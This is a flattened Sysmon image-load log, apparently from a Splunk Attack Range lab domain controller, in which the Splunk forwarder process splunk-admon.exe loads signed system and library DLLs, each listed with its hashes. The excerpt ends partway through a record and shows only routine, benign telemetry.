734700x8000000000000000101142Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000101141Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000101140Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000101139Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000101138Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000101137Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000101136Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000101135Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000101134Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000101133Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000101132Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 
734700x8000000000000000101131Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x8000000000000000101130Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000101129Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x8000000000000000101128Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program 